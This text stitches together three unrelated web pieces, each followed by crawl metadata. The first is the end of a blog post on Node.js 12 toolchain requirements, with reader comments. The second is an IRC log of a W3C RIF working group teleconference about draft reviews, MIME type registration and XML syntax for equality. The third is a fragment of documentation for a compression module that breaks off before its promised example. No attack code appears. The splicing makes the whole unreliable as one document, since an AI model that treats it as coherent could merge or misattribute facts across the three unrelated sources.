And last but not least, there are new requirements for running Node itself.
With newer features coming to Node.js via internal improvements and upgrades to the C++ of the V8 engine, comes new minimum requirements for Node.js 12. The codebase now needs a minimum of GCC 6 and glibc 2.17 on platforms other than macOS and Windows. Binaries released use this new toolchain minimum and include new compile-time performance and security enhancements.
If you’re using Mac or Windows machines, you should be fine: Windows minimums are the same for running Node.js 11, Mac users will need at least Xcode 8 and a minimum macOS of 10.10 “Yosemite”. Linux compatible binaries from nodejs.org will support Enterprise Linux 7, Debian 8 and Ubuntu 14.04, but custom toolchains on systems not natively supporting GCC 6 may be necessary. I’m sure you’ll figure out what’s needed quickly enough.
Conclusion
Yes, Node.js is only 10 years old, yes, it’s single threaded, and yes, it is not as widely adopted and leveraged as some other programming languages, but Node boasts something no other programming language can claim: it is built with JavaScript, and can run both on the client and server side.
And the teams and companies working to support and improve Node are some of the best and brightest in the business. Node has continued to learn from core JavaScript and other languages, cherry-picking the right pieces to incorporate into itself, becoming a better and better platform for developers and applications, alike.
Node.js 12 brings about some extremely exciting improvements like ES6 module support, better application security, and quicker startup times. Although it will not go into LTS (long term support) mode until October 2019 I’m pumped to dig into these new features and see what else the team can dream up to continue making this platform a great server-side solution. “Node.js 12: The future of server-side JavaScript”
Clarification towards the end… Node is *NOT* single-threaded. The main JS runs in an event loop on a single thread. Async I/O (and often other compiled modules) run within a thread pool. Node doesn’t run server and browser, but the code can run on both.
Clarification, not all async events are using thread pool, many of them use low level underlying OS functionality, but not separate thread polling. Http module is the best example.
Also, node doesn’t have to “produce dynamic web content”. It does any type of server-side (or even command line) work. It can power a websocket server, PDF export service, host an event/message system or do any other work not related to rendering web pages.
Thanks for sharing this. | https://blog.logrocket.com/node-js-12/ | CC-MAIN-2019-43 | refinedweb | 1,857 | 55.13 |
IRC log of rif on 2008-07-01
Timestamps are in UTC.
14:46:48 [RRSAgent]
RRSAgent has joined #rif
14:46:48 [RRSAgent]
logging to
14:46:56 [ChrisW]
rrsagent, make minutes
14:46:56 [RRSAgent]
I have made the request to generate
ChrisW
14:47:04 [ChrisW]
zakim, this will be rif
14:47:04 [Zakim]
ok, ChrisW; I see SW_RIF()11:00AM scheduled to start in 13 minutes
14:47:20 [ChrisW]
Meeting: RIF Telcon 1-Jul-2008
14:47:27 [ChrisW]
Chair: Chris Welty
14:47:48 [ChrisW]
ChrisW has changed the topic to: 1 July RIF telecon agenda
14:47:53 [ChrisW]
Agenda:
14:48:06 [ChrisW]
rrsagent, make logs public
14:48:13 [ChrisW]
zakim, clear agenda
14:48:13 [Zakim]
agenda cleared
14:48:39 [ChrisW]
agenda+ Admin
14:48:50 [ChrisW]
agenda+ Liason
14:48:56 [ChrisW]
agenda+ F2F11
14:49:00 [ChrisW]
agenda+ Action Review
14:49:10 [ChrisW]
agenda+ Publication plans
14:49:16 [ChrisW]
agenda+ PRD
14:49:22 [ChrisW]
agenda+ ISSUE-61 (casting)
14:49:26 [ChrisW]
agenda+ AOB
14:49:35 [ChrisW]
next agendum
14:49:51 [ChrisW]
zakim, next agendum
14:49:51 [Zakim]
agendum 1 was just opened, ChrisW
14:50:59 [csma]
csma has joined #rif
14:51:09 [csma]
list agenda
14:59:22 [sandro]
zakim, who is on the call?
14:59:22 [Zakim]
apparently SW_RIF()11:00AM has ended, sandro
14:59:24 [Zakim]
On IRC I see csma, RRSAgent, ChrisW, sandro, Harold, trackbot, Zakim
14:59:48 [Zakim]
SW_RIF()11:00AM has now started
14:59:50 [Zakim]
+??P6
15:00:14 [csma]
zakim, ??P6 is me
15:00:14 [Zakim]
+csma; got it
15:00:48 [Zakim]
+Sandro
15:00:50 [Zakim]
-Sandro
15:00:50 [Zakim]
+Sandro
15:00:51 [josb]
josb has joined #rif
15:00:56 [Zakim]
+ +39.047.101.aaaa
15:01:27 [mdean]
mdean has joined #rif
15:02:06 [StellaMitchell]
StellaMitchell has joined #rif
15:02:10 [Zakim]
+Mike_Dean
15:02:41 [Zakim]
+[IBM]
15:02:46 [ChrisW]
zakim, ibm is temporarily me
15:02:46 [Zakim]
+ChrisW; got it
15:03:19 [AxelPolleres]
AxelPolleres has joined #rif
15:03:30 [Zakim]
+[IBM]
15:03:35 [StellaMitchell]
zakim, ibm is temporarily me
15:03:35 [Zakim]
+StellaMitchell; got it
15:04:04 [csma]
Axel, would you like to scribe?
15:04:14 [ChrisW]
zakim, who is on the phone?
15:04:14 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell
15:04:19 [LeoraMorgenstern]
LeoraMorgenstern has joined #rif
15:04:49 [Zakim]
+LeoraMorgenstern
15:05:48 [Zakim]
+??P43
15:06:11 [AxelPolleres]
:-)
15:06:23 [AxelPolleres]
scribe: Axel Polleres
15:06:32 [AxelPolleres]
scribenick: AxelPolleres
15:06:45 [ChrisW]
Harold, are you joining?
15:06:50 [AxelPolleres]
csma: Any agenda changes?
15:07:00 [csma]
15:07:01 [AxelPolleres]
... no
15:07:13 [ChrisW]
PROPOSED: Accept last week's minutes
15:07:16 [AxelPolleres]
... objections to accept the minutes of last week?
15:07:18 [ChrisW]
RESOLVED: Accept last week's minutes
15:07:22 [AxelPolleres]
... none. accepted.
15:07:49 [AxelPolleres]
ChrisW: were the minutes from two weeks ago accepted? ... yes.
15:08:01 [csma]
next item
15:08:14 [AxelPolleres]
TOPIC: Liaison
15:08:49 [AxelPolleres]
csma: We had an OMG PRR meeting last week; the deadline for the final report has been moved to 3 months from now.
15:09:05 [AxelPolleres]
... we try to delay PRR to "wait" for RIF PRD.
15:09:07 [csma]
next item
15:09:20 [AxelPolleres]
TOPIC: F2F11
15:09:38 [AxelPolleres]
csma: date is fixed.
15:09:52 [sandro]
Sep 26-27 (Friday/Saturday)
15:10:10 [AxelPolleres]
ChrisW: Yes, it is: Sep 26-27.
15:10:34 [AxelPolleres]
csma: location: Manhattan or Boston.
15:10:41 [josb]
+1 Manhattan
15:10:53 [AxelPolleres]
+/-0
15:10:56 [josb]
s/Boston/Hawthorne/
15:10:57 [Hassan]
Hassan has joined #rif
15:11:18 [Zakim]
+ +33.2.72.26.aabb
15:11:41 [AxelPolleres]
csma and sandro discussing hotel prices in NY.
15:11:41 [Zakim]
+Gary_Hallmark
15:12:17 [AxelPolleres]
ChrisW: Hotels are considerably more expensive, also transport.
15:13:45 [MichaelKifer]
MichaelKifer has joined #rif
15:13:48 [AxelPolleres]
TOPIC: Action review
15:13:57 [ChrisW]
zakim, next item
15:13:57 [Zakim]
agendum 5. "Publication plans" taken up [from ChrisW]
15:14:05 [ChrisW]
zakim, list agenda
15:14:05 [Zakim]
I see 4 items remaining on the agenda:
15:14:06 [Zakim]
5. Publication plans [from ChrisW]
15:14:06 [Zakim]
6. PRD [from ChrisW]
15:14:07 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
15:14:07 [Zakim]
8. AOB [from ChrisW]
15:14:10 [sandro]
15:14:17 [ChrisW]
zakim, take up item 4
15:14:17 [Zakim]
agendum 4. "Action Review" taken up [from ChrisW]
15:14:25 [GaryHallmark]
GaryHallmark has joined #rif
15:14:44 [AxelPolleres]
Action 534: CONTINUED.
15:14:44 [trackbot]
Sorry, couldn't find user - 534
15:15:27 [Zakim]
+ +1.631.833.aacc
15:15:41 [ChrisW]
zakim, who is on the phone?
15:15:41 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, Hassan (muted), Gary_Hallmark, +1.631.833.aacc
15:15:56 [MichaelKifer]
zakim, aacc is me
15:15:56 [Zakim]
+MichaelKifer; got it
15:16:00 [AxelPolleres]
Action-530: CONTINUED.
15:16:00 [trackbot]
ACTION-530 Review final BLD LC draft notes added
15:16:13 [MichaelKifer]
zakim, mute me
15:16:13 [Zakim]
MichaelKifer should now be muted
15:16:46 [ChrisW]
Harold, are you joining?
15:17:20 [AxelPolleres]
Leora: The resolutions in the documents are not always clear.
15:17:29 [MichaelKifer]
harold will be late
15:18:01 [AxelPolleres]
... e.g.
15:18:43 [AxelPolleres]
csma: references to DTB have been clarified by last week's resolution.
15:19:03 [AxelPolleres]
Leora: When will BLD be frozen enough to complete the action?
15:20:58 [josb]
the RDF namespace is already used for XMLLiteral
15:21:20 [conan]
conan has joined #rif
15:21:24 [csma]
15:21:59 [sandro]
15:22:12 [Zakim]
+Mark_Proctor
15:22:18 [AxelPolleres]
ACTION-521: CONTINUED.
15:22:18 [trackbot]
ACTION-521 Work with Jie Bao (of OWL-WG) to put together draft on rif:text/owl:internationalizedText notes added
15:22:38 [josb]
q+
15:22:53 [ChrisW]
action: sandro to work on getting access to OWL wiki for internationalized text article
15:22:53 [trackbot]
Created ACTION-535 - Work on getting access to OWL wiki for internationalized text article [on Sandro Hawke - due 2008-07-08].
15:23:39 [AxelPolleres]
josb: sandro, question about the previous item. There are two links on the OWL site for that; what is the difference?
15:24:31 [AxelPolleres]
ACTION-517: continued.
15:24:32 [trackbot]
ACTION-517 Review FLD [june 23] notes added
15:24:40 [josb]
q-
15:24:56 [AxelPolleres]
... all other review actions also continued.
15:25:15 [AxelPolleres]
ACTION-510: continued.
15:25:15 [trackbot]
ACTION-510 Remove UPDATE, EXECUTE and ASSIGN from PRD notes added
15:26:51 [ChrisW]
zakim, list agenda
15:26:51 [Zakim]
I see 4 items remaining on the agenda:
15:26:53 [Zakim]
5. Publication plans [from ChrisW]
15:26:53 [Zakim]
6. PRD [from ChrisW]
15:26:54 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
15:26:54 [Zakim]
8. AOB [from ChrisW]
15:26:57 [ChrisW]
zakim, take up item 5
15:26:57 [Zakim]
agendum 5. "Publication plans" taken up [from ChrisW]
15:27:01 [AxelPolleres]
sandro: no point to talk about actions on metadata without Harold and Michael.
15:27:11 [AxelPolleres]
TOPIC: Publication plan.
15:27:15 [MichaelKifer]
zakim, unmute me
15:27:15 [Zakim]
MichaelKifer should no longer be muted
15:27:45 [AxelPolleres]
Michael: We are still working on some aspects of PS to XML translation.
15:28:01 [AxelPolleres]
... made some significant improvements, not yet finished.
15:28:32 [AxelPolleres]
csma: you can use some example from PRD, maybe.
15:28:43 [josb]
q+
15:29:11 [AxelPolleres]
Michael: we define a recursive function, but we still have the translation of Prefix and Base left; it will take only a couple of days more.
15:29:33 [AxelPolleres]
... should be doable in one or two days, depends on Harold's schedule.
15:29:36 [csma]
ack josb
15:30:07 [AdrianP]
AdrianP has joined #rif
15:30:42 [AxelPolleres]
josb: looked over the XML translation... looks good. But I thought we don't need to define translations for Base and Prefix.
15:30:59 [AxelPolleres]
Michael: well, they are part of the language, so we should explain it.
15:31:13 [AxelPolleres]
... I don't see how we get around this.
15:31:22 [Zakim]
+[NRCC]
15:31:35 [AxelPolleres]
... we have to define the translation to entity definitions.
15:31:58 [Harold]
zakim, [NRCC] is me
15:31:58 [Zakim]
+Harold; got it
15:32:07 [AxelPolleres]
Harold: (just joined) looked it up, it can be done.
15:32:24 [AxelPolleres]
csma: outr question was, when would we have it finished?
15:32:33 [AxelPolleres]
s/outr/our/
15:32:43 [AxelPolleres]
Harold: two days
15:33:02 [AxelPolleres]
csma: so we can freeze BLD on Friday.
15:33:22 [AxelPolleres]
Harold: yes.
15:33:43 [AxelPolleres]
josb: we need two things: entities, and XML namespaces for Prefix.
15:34:20 [AxelPolleres]
Harold: ... no it is all only between the tags, so we don't need namespaces.
15:34:50 [Harold]
For pretty print, switch to XML:
15:34:50 [Harold]
Then view:
15:34:50 [Harold]
Harold
15:34:56 [csma]
q?
15:35:03 [AxelPolleres]
Michael: They do XML namespaces in OWL/XML, but it doesn't seem necessary.
15:35:34 [AxelPolleres]
Harold: I have pasted some links that illustrate this.
15:36:03 [AxelPolleres]
... the namespace definitions don't seem to be necessary in those examples.
15:36:17 [AxelPolleres]
ChrisW: we seem to all agree here.
15:36:50 [AxelPolleres]
josb: why do we need entities/namespaces at all? we can just expand at preprocessing.
15:36:55 [AxelPolleres]
q+
15:37:17 [AxelPolleres]
... but I am not very concerned with it.
15:38:06 [AxelPolleres]
Michael: We can state that all prefixes should be preprocessed. Don't know whether this is simpler, though.
15:38:08 [csma]
ack axel
15:39:57 [csma]
q?
15:40:24 [AxelPolleres]
I tend more towards describing the preprocessing of prefixes.
15:40:50 [AxelPolleres]
josb: would prefer preprocessing, but don't oppose other option (entity definitions)
15:41:08 [AxelPolleres]
Harold: preprocessing can be implemented in the document quickly.
15:41:27 [AxelPolleres]
... we also need to clarify the MIME type question.
15:42:05 [AxelPolleres]
sandro: We need a MIME type registration.
15:42:24 [MichaelKifer]
zakim, mute me
15:42:24 [Zakim]
MichaelKifer should now be muted
15:42:46 [AxelPolleres]
harold: I just replaced RDF by RIF in some template from RDF for that.
15:43:04 [josb]
q+
15:43:16 [AxelPolleres]
sandro: when we go to LC, we have to have the MIME type registered/acknowledged.
15:43:28 [AxelPolleres]
csma: who can finish that?
15:43:33 [csma]
ack josb
15:43:39 [AxelPolleres]
sandro: none of us has experience with that.
15:43:55 [josb]
15:44:16 [Harold]
Michael and all, yes, we would need to add a sentence or two saying something like: The presentation syntax for Base and Prefix will be preprocessed by expanding the Base and Prefix names into full URIs. Only that expanded version will then be translated to XML as shown in this section.
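[Editorial note, not part of the original log: a minimal sketch of the Prefix/Base preprocessing described above, i.e. expanding compact names against a prefix map and resolving relative names against the Base before XML translation. The prefix "ex" and all IRIs are invented for illustration.]

```python
# Sketch of Prefix/Base expansion prior to XML translation.
# Names like "ex" and the example IRIs are hypothetical.

def expand(term, prefixes, base):
    """Expand a prefixed name or relative IRI into a full IRI."""
    if ":" in term:
        pfx, local = term.split(":", 1)
        if pfx in prefixes:          # prefixed name, e.g. ex:ppl
            return prefixes[pfx] + local
        return term                   # already an absolute IRI
    return base + term                # relative name, resolved against Base

prefixes = {"ex": "http://example.org/"}
base = "http://example.org/doc#"

print(expand("ex:ppl", prefixes, base))   # http://example.org/ppl
print(expand("rule1", prefixes, base))    # http://example.org/doc#rule1
```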
15:44:32 [AxelPolleres]
josb: do we need some formal/informal registration with IANA?
15:44:45 [ChrisW]
Harold - Just put that in the function
15:44:55 [AxelPolleres]
... RDF had it in a deparate document.
15:45:13 [josb]
s/deparate/separate/
15:45:17 [AxelPolleres]
sandro: doesn't need to be a separate doc, can be an appendix in BLD.
15:45:40 [AxelPolleres]
Harold: need some help/feedback on the XML Schema.
15:45:52 [ChrisW]
action: sandro to finish mime type for BLD
15:45:52 [trackbot]
Created ACTION-536 - Finish mime type for BLD [on Sandro Hawke - due 2008-07-08].
15:46:24 [AxelPolleres]
csma: who will finish the mime type stuff?
15:46:31 [josb]
q+
15:46:36 [AxelPolleres]
sandro: will do it/clarify it by friday.
15:47:26 [Harold]
RE: Media-Type (MIME type) for RIF
15:48:28 [AxelPolleres]
Harold, josb, axel: does not affect SWC and DTB.
15:48:36 [csma]
ack josb
15:48:37 [ChrisW]
ack josb
15:49:02 [AxelPolleres]
josb: can do a review on Wed July 9th.
15:49:07 [csma]
PROPOSED: Mark "external frames" AT RISK in BLD
15:49:15 [Harold]
RE: Media-Type (MIME type) for RIF
15:50:35 [AxelPolleres]
csma: we want to mark external frames at risk in bld since we don't understand what they are.
15:50:49 [ChrisW]
ACTION: harold to mark external frames "at risk" in BLD
15:50:49 [trackbot]
Created ACTION-537 - Mark external frames \"at risk\" in BLD [on Harold Boley - due 2008-07-08].
15:51:14 [csma]
RESOLVED: Mark "external frames" at risk in BLD
15:52:00 [AxelPolleres]
csma: when can you do the review, leora?
15:52:08 [AxelPolleres]
leora: over the weekend.
15:53:44 [AxelPolleres]
ChrisW: the whole WG is responsible to take a look as well!!! i.e. if no more complaints, jos and leora's reviews will be the last step before going the next step to LC, after jos and leora's reviews.
15:54:51 [AxelPolleres]
csma: this means, jos and leora, make clear in your review whether it is a "Go", or a "No Go"
15:55:13 [AxelPolleres]
ChrisW: same question now to jos: when do you expect to freeze SWC?
15:56:19 [AxelPolleres]
... and same for DTB, Axel?
15:56:27 [AxelPolleres]
josb: after dtb.
15:56:34 [AxelPolleres]
axel: DTB is frozen from my side.
15:57:05 [AxelPolleres]
... (for first WD), but would like to have another review, of course.
15:57:28 [AxelPolleres]
josb: SWC will be frozen by Tue, COB.
15:58:30 [AxelPolleres]
csma: I will review SWC, can give go-nogo, Tue, 15th, COB.
15:58:43 [AxelPolleres]
csma: Michael, when id FLD frozen?
15:58:59 [MichaelKifer]
zakim, unmute me
15:58:59 [Zakim]
MichaelKifer should no longer be muted
15:59:05 [AxelPolleres]
Harold: only XSD missing... will be one week form now.
15:59:31 [AxelPolleres]
Michael: we have to fix the table and force other improvements from BLD, but can be done within a week.
16:00:00 [AxelPolleres]
... after next telecon, Friday 11th.
16:00:16 [AxelPolleres]
csma: who can review?
16:00:40 [AxelPolleres]
chrisW, josb: by 15th.
16:00:56 [ChrisW]
zakkim, list agenda
16:01:04 [AxelPolleres]
csma: now what about PRD, ChrisW, pls take over chairing.
16:01:09 [ChrisW]
zakim, list agenda
16:01:09 [Zakim]
I see 4 items remaining on the agenda:
16:01:10 [Zakim]
5. Publication plans [from ChrisW]
16:01:10 [Zakim]
6. PRD [from ChrisW]
16:01:11 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
16:01:11 [Zakim]
8. AOB [from ChrisW]
16:01:17 [ChrisW]
zakim, take up item 6
16:01:17 [Zakim]
agendum 6. "PRD" taken up [from ChrisW]
16:01:25 [AxelPolleres]
TOPIC: PRD
16:01:46 [AxelPolleres]
ChrisW: discussions on the mailinglist.
16:02:23 [AxelPolleres]
... Christian, you sent a list of interim solutions for 1st WD compromises.
16:02:42 [AxelPolleres]
Gary: I had a look, sounds great.
16:03:12 [AxelPolleres]
csma: I had some things worked out already, few small edits still to implement.
16:03:45 [markproctor]
for no-loop yes.
16:03:46 [ChrisW]
zakim, who is on the phone?
16:03:46 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, Hassan (muted), Gary_Hallmark, MichaelKifer, Mark_Proctor, Harold
16:03:57 [markproctor]
ORB is just built on jess.
16:04:00 [AxelPolleres]
Gary: (would you might typing in your remark yourself)
16:04:11 [MichaelKifer]
zakim, mute me
16:04:11 [Zakim]
MichaelKifer should now be muted
16:04:27 [AxelPolleres]
ChrisW: Let us discuss 1st WD schedule and then get back to details.
16:04:38 [markproctor]
end of the day it comes down to. If you change a fact and for the same rule and same matched data it re-matches do we activate or not.
16:04:50 [markproctor]
by default jrules does not.
16:05:00 [markproctor]
jess/drools/clips will re-match unless no-loop is used.
16:05:21 [AxelPolleres]
csma+Gary discussing some resolution on conditional retract/assert
16:05:33 [AxelPolleres]
csma: will have all changes implemented tomorrow.
16:05:45 [AxelPolleres]
... adrian and gary are the reviewers.
16:06:14 [AxelPolleres]
chrisW: Can you take an action to give the final go/nogo for 1st WD?
16:06:32 [ChrisW]
action: Gary to review frozen PRD WD Thursday
16:06:32 [trackbot]
Created ACTION-538 - Review frozen PRD WD Thursday [on Gary Hallmark - due 2008-07-08].
16:06:36 [AxelPolleres]
Gary: will be gone 4-20th, but can review on Thu.
16:07:09 [AxelPolleres]
ChrisW: We will have PRD frozen tomorrow and Gary giving final go/nogo for WD on Thu.
16:07:23 [AxelPolleres]
... any more technical discussions necessary?
16:07:26 [ChrisW]
discussion of "norepeat"
16:07:29 [markproctor]
ilog does 'no-repeat" as default.
16:07:47 [markproctor]
drools, jess, clips do not - you must specify the no-loop attribute for the rule.
16:08:32 [markproctor]
no you can't do that.
16:08:36 [markproctor]
you cant do it per rule
16:08:40 [markproctor]
it has to be per rule + row of data.
16:08:49 [AxelPolleres]
csma: semantics of norepeat is explained exactly like Gary wants in the current proposal.
16:08:56 [markproctor]
no rule execution, except of the data, is not really a valid use case.
16:08:57 [GaryHallmark]
16:08:57 [GaryHallmark]
"The default refraction mechanism avoids executing the same rule several times on the same object instances, even if the rule conditions are met again after a change on an object."
16:09:02 [markproctor]
hwo do I get on the phone queuue?
16:09:10 [AxelPolleres]
Gary: that doesn't seem to be what ILOG does in their implementation.
16:09:14 [markproctor]
correct - the row of data is the important bit.
16:09:15 [AxelPolleres]
csma: will check back.
16:09:56 [markproctor]
guess no more needs to be said now.
16:10:19 [markproctor]
AxelPolleres: i've never actually run JRules, so can't qualify. can just say what I've been told and read, and drawn from my own understanding of PR systems.
16:10:31 [AxelPolleres]
csma: am sure to be finished by tomorrow, apart from norepeat, may be marked in the draft.
16:11:29 [AxelPolleres]
Gary: Should we have architectural principles to minimize divergence for new dialects from BLD/Core?
16:12:31 [AxelPolleres]
... I'd like to have feedback from the non-PR people here.
16:12:56 [AxelPolleres]
ChrisW: hard to follow for the non-PR people who don't tread the whole thread in detail.
16:13:18 [AxelPolleres]
s/don't tread/didn't read/
16:13:49 [AxelPolleres]
csma: I'd urge all people to give their opinions on the PRD draft.
16:14:33 [markproctor]
did everyone get my excel file I emailed to the list?
16:14:54 [AxelPolleres]
... my view is slightly different from Gary's. My concern is more putting in balance to make the mainstream PR engine people happy over maximizing BLD overlapping.
16:15:23 [markproctor]
does it help at all? maybe we can grow it further to correct different engine capabilities.
16:15:29 [markproctor]
will help decide on features to support.
16:16:59 [markproctor]
just added no-loop to my list.
16:17:37 [ChrisW]
q?
16:17:43 [AxelPolleres]
Gary: I have a hard time giving a handle on the argument here, Clips looks pretty much like BLD, for instance.
16:17:47 [markproctor]
is there a website I can put this spreadsheet?
16:17:50 [markproctor]
or some google docs?
16:17:53 [AdrianP]
AdrianP has joined #rif
16:18:11 [josb]
use the wiki
16:18:36 [csma]
Mark, I did not have an opportunity to look at it yet. But that's certainly useful.
16:18:54 [markproctor]
csma: I apologise if anything is wrong.
16:19:02 [AxelPolleres]
ChrisW: I don't think that following PR engine people is the most relevant, let them speak for themselves within the group.
16:19:38 [markproctor]
guys you are adding language semantics now, can we move on?
16:19:44 [markproctor]
sorry s/adding/argueing/
16:20:28 [AxelPolleres]
csma: I think mark's work in his excel sheet is interesting.
16:21:00 [AxelPolleres]
... I am arguing for publishing PRD as early as possible.
16:21:01 [markproctor]
no it's fine.
16:21:14 [Harold]
Chairs, we need to come back in the ongoing telecon to freezing BLD for a moment: As has been often discussed, Equal roles need to be left and right:
16:21:15 [ChrisW]
zakim, list agenda
16:21:15 [Zakim]
I see 4 items remaining on the agenda:
16:21:17 [Zakim]
5. Publication plans [from ChrisW]
16:21:17 [Zakim]
6. PRD [from ChrisW]
16:21:18 [AxelPolleres]
ChrisW: do we have some time to talk about casting?
16:21:19 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
16:21:19 [Zakim]
8. AOB [from ChrisW]
16:21:22 [ChrisW]
zakim, take up item 7
16:21:22 [Zakim]
agendum 7. "ISSUE-61 (casting)" taken up [from ChrisW]
16:21:25 [markproctor]
ok, i'm trying to make up some wiki table now for htis
16:22:22 [AxelPolleres]
Harold: we need to split the role of LHS and RHS in equals.
16:22:26 [Adrian]
Adrian has joined #rif
16:22:54 [josb]
q+
16:23:16 [csma]
PROPOSED: Change the roles in Equal from "side" to "left" and "right" (in BLD XML)
16:23:24 [csma]
ack josb
16:23:27 [AxelPolleres]
Topic went back to BLD/XML ...
16:23:41 [josb]
-1
16:24:00 [Harold]
You cannot even say Equal(x y) = Equal(y x) without splitting side into left and right.
16:24:09 [Hassan]
Such is called a rewrite rule, Harold. So why not call it that instead of equation?
16:24:37 [Harold]
This is the job of the semantics.
16:24:44 [AxelPolleres]
Harold: reasons: we cannot talk about symmetry of equality in the semantics, if they are symmetric per definiton in the syntax.
16:24:58 [ChrisW]
q?
16:25:24 [sandro]
jos: I would not oppose changing names in *XML*.
16:25:24 [MichaelKifer]
zakim, unmute me
16:25:24 [Zakim]
MichaelKifer should no longer be muted
16:25:25 [AxelPolleres]
josb: it should be interpreted as identity.
16:25:43 [AxelPolleres]
... I don't care about BLD/XML, though.
16:25:56 [Hassan]
I favor lhs/rhs rather than side/side (actually I did from the start) ...
16:26:12 [AxelPolleres]
Harold: in PS there is a distinction between left and right of the '=' sign anyway.
16:26:20 [MichaelKifer]
zakim, mute me
16:26:20 [Zakim]
MichaelKifer should now be muted
16:26:24 [AxelPolleres]
s/Harold/Michael/
16:26:41 [AxelPolleres]
josb: then fine, if it is only in the XML syntax.
16:26:42 [markproctor]
how do I unlock a page?
16:26:51 [josb]
0 on the resolution
16:26:53 [markproctor]
created this -
16:26:59 [markproctor]
I go to edit and it says it's been locked
16:26:59 [sandro]
markproctor, you have to log in, and have a WG-enabled account.
16:27:11 [markproctor]
"This page has been locked to prevent editing. "
16:27:15 [csma]
PROPOSED: Change the tag name of the sub elements of Equal in BLD XML from side to left and right
16:27:15 [markproctor]
ah bugger
16:27:18 [AxelPolleres]
-0 (why can't we drop sides tag at all?)
16:27:20 [sandro]
"locked" is media-wiki speak for "you don't have write access"
16:27:21 [Hassan]
+1
16:27:22 [Harold]
+1
16:27:23 [markproctor]
I probably had one already, but forget what it is.
16:27:26 [MichaelKifer]
+1
16:27:27 [sandro]
+1
16:27:27 [ChrisW]
0
16:27:31 [josb]
0
16:27:36 [markproctor]
just created a new account, mdproctor
16:27:39 [josb]
(don't care)
16:28:01 [AxelPolleres]
RESOLVED: Change the tag name of the sub elements of Equal in BLD XML from side to left and right
16:28:26 [Hassan]
+1
16:28:26 [ChrisW]
+1
16:28:31 [GaryHallmark]
+1
16:28:32 [markproctor]
can someone enable mdproctor as a username? and I'll do this wiki page now?
16:28:36 [ChrisW]
zakim, list attendees
16:28:36 [Zakim]
As of this point the attendees have been csma, Sandro, +39.047.101.aaaa, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, +33.2.72.26.aabb, Gary_Hallmark,
16:28:40 [Zakim]
... Hassan, +1.631.833.aacc, MichaelKifer, Mark_Proctor, Harold
16:28:43 [sandro]
markproctor, you didn't have an account before. The general advice would be to use the account "Mark Proctor". spaces, etc, are fine.
16:28:51 [Zakim]
-josb
16:28:57 [ChrisW]
Regrets: AdrianPaschke PaulVincent DaveReynolds
16:28:57 [Zakim]
-Hassan
16:28:58 [Zakim]
-LeoraMorgenstern
16:29:00 [Zakim]
-StellaMitchell
16:29:01 [Zakim]
-MichaelKifer
16:29:02 [sandro]
markproctor, but mdproctor is okay, if you want.....
16:29:03 [ChrisW]
rrsagent, make minutes
16:29:03 [RRSAgent]
I have made the request to generate
ChrisW
16:29:03 [Zakim]
-Gary_Hallmark
16:29:04 [Zakim]
-Harold
16:29:05 [Zakim]
-Mike_Dean
16:29:14 [markproctor]
ah ok i already created it, sorry.
16:29:16 [csma]
zakim, who is on the call?
16:29:16 [Zakim]
On the phone I see csma, Sandro, ChrisW, AxelPolleres, Mark_Proctor
16:29:18 [markproctor]
shall I create another one?
16:29:19 [ChrisW]
zakim, who is on the phone?
16:29:19 [Zakim]
On the phone I see csma, Sandro, ChrisW, AxelPolleres, Mark_Proctor
16:29:29 [sandro]
sure, another one is fine, markproctor
16:29:48 [Zakim]
-AxelPolleres
16:31:12 [markproctor]
ok done
16:31:12 [ChrisW]
zakim, drop Mark_Proctor
16:31:12 [Zakim]
Mark_Proctor is being disconnected
16:31:13 [Zakim]
-Mark_Proctor
16:31:14 [markproctor]
created markproctor
16:31:26 [sandro]
okay, one sec
16:32:04 [sandro]
markproctor, it should work now.
16:32:36 [Zakim]
-ChrisW
16:32:37 [Zakim]
-Sandro
16:32:37 [Zakim]
-csma
16:32:38 [Zakim]
SW_RIF()11:00AM has ended
16:32:40 [Zakim]
Attendees were csma, Sandro, +39.047.101.aaaa, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, +33.2.72.26.aabb, Gary_Hallmark, Hassan, +1.631.833.aacc,
16:32:42 [Zakim]
... MichaelKifer, Mark_Proctor, Harold
16:33:31 [markproctor]
sandro: ok please delete mdproctor
16:33:50 [markproctor]
does anyone want me to add any other vendor columns?
16:34:02 [sandro]
I think everyone else is gone....
16:34:08 [markproctor]
I don't see a need for FIC or OBR. FIC uses OPSJ and OBR uses Jess.
16:34:10 [markproctor]
ok
16:35:48 [AxelPolleres]
Adrian?
16:39:42 [markproctor]
how do you do tables?
16:39:46 [markproctor]
the editing help page is empty
16:41:07 [markproctor]
||Clips 6.3|Jess 7.1|Drools 4.0.7|JRules ?|OPSJ ?|
16:41:09 [markproctor]
does not produce a table
16:45:24 [markproctor]
ping?
16:45:33 [markproctor]
sandro: can you help me make a table?
16:45:50 [markproctor]
tried putting { ...} brackets around the above, didn't work.
16:46:12 [markproctor]
is this a specific wiki, that I can go to to get he editing manual?
16:49:23 [markproctor]
ah its mediawiki, found docs | http://www.w3.org/2008/07/01-rif-irc | CC-MAIN-2016-36 | refinedweb | 4,726 | 72.97 |
On 2015-05-01 3:23 PM, Yury Selivanov wrote: > Let. > To further clarify on the example: class SomeIterable: def __iter__(self): return self async def __aiter__(self): return self async def __next__(self): print('hello') raise StopAsyncIteration If you pass this to 'async for' you will get 'hello' printed and the loop will be over. If you pass this to 'for', you will get an infinite loop, because '__next__' will return a coroutine object (that has to be also awaited, but it wouldn't, because it's a plain 'for' statement). This is something that we shouldn't let happen. Yury | https://mail.python.org/pipermail/python-dev/2015-May/139764.html | CC-MAIN-2017-47 | refinedweb | 102 | 65.05 |
Before we go into the details of the classes belonging to this module we want to give an overview of the different components and how they interact. We start with an example. Suppose you want to write a string to a compressed file named ``foo'' and read it back from the file. Then you can use the following program:
